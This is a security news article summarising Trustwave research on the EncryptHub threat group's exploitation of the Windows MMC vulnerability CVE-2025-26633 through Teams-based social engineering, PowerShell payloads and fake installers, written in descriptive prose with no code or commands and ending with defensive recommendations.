Ongoing Threat from EncryptHub: Exploiting Windows Vulnerabilities
The cyber threat landscape continues to evolve, and the group known as EncryptHub remains at the forefront of this evolution. This Russian hacking collective has been leveraging newly discovered vulnerabilities in Microsoft Windows to deploy malicious payloads that pose significant risks to organizations.
The Exploitation of the MSC EvilTwin Vulnerability
Recent findings from Trustwave SpiderLabs reveal that EncryptHub is actively exploiting a vulnerability within the Microsoft Management Console (MMC) framework, identified as CVE-2025-26633, commonly referred to as the MSC EvilTwin vulnerability. Their tactics combine social engineering with this technical exploit to penetrate security defenses, allowing them to take control of internal systems.
Researchers Nathaniel Morales and Nikita Kazymirskyi from Trustwave noted that these actions reflect a broader trend of malicious activities that integrate social manipulation with technical exploitation techniques.
A Brief Background on EncryptHub
EncryptHub, also known as LARVA-208 or Water Gamayun, emerged as a notable threat actor in mid-2024. This financially motivated group has developed a repertoire of tactics aimed at infecting targets with stealers and other malware. Their strategies range from posting fake job offers and portfolio requests to even targeting compromised Steam games, employing various methods to gain access to sensitive information.
Technical Details of Their Latest Campaign
The latest campaign involves EncryptHub posing as IT personnel and initiating Microsoft Teams requests to their targets. This approach aims to establish unauthorized remote connections, facilitating the deployment of secondary malicious payloads through PowerShell commands.
Delivery Mechanism
Two MSC files with identical names play a pivotal role in this attack. One of these files is harmless, while the other leverages the CVE-2025-26633 vulnerability to execute malicious commands. Once the benign file is opened, it triggers the execution of the rogue MSC file, which subsequently fetches an external PowerShell script designed to gather system data, ensure persistence, and communicate with EncryptHub’s command-and-control (C2) server.
Payloads and Execution
This PowerShell script is capable of receiving AES-encrypted commands from the attackers. These commands are decrypted and executed directly on the compromised system, allowing for extensive control. Further complicating matters, a Go-based malware loader named SilentCrystal is also employed, which exploits the legitimate Brave Support platform to deliver additional malicious files and weaponize the CVE-2025-26633 vulnerability.
Innovative Deception Tactics
The sophistication of EncryptHub’s operations is evident through their use of false video conferencing setups like RivaTalk to trick users into downloading harmful installers. These installers typically contain legitimate binaries that are manipulated to introduce harmful components, facilitating further infiltration into the victim’s system.
Conclusion of Malicious Operations
Once executed, these installers gather extensive system metadata and await additional PowerShell instructions, which may be encoded and run, granting attackers unhindered access to the system. They also generate deceptive network traffic patterns to mask their communications with the C2 server, complicating detection efforts.
Importance of Layered Defense
The EncryptHub group exemplifies a well-resourced, adaptive adversary that employs multiple techniques—social engineering, trusted platform abuse, and vulnerability exploitation—to maintain that persistent control over systems. Trustwave emphasizes the critical need for layered defense strategies, continuous threat intelligence updates, and robust user awareness training to mitigate the risks posed by such advanced threats.
In an environment where cyber threats are becoming increasingly sophisticated, understanding and addressing these dynamics is essential for organizations seeking to safeguard their digital assets.
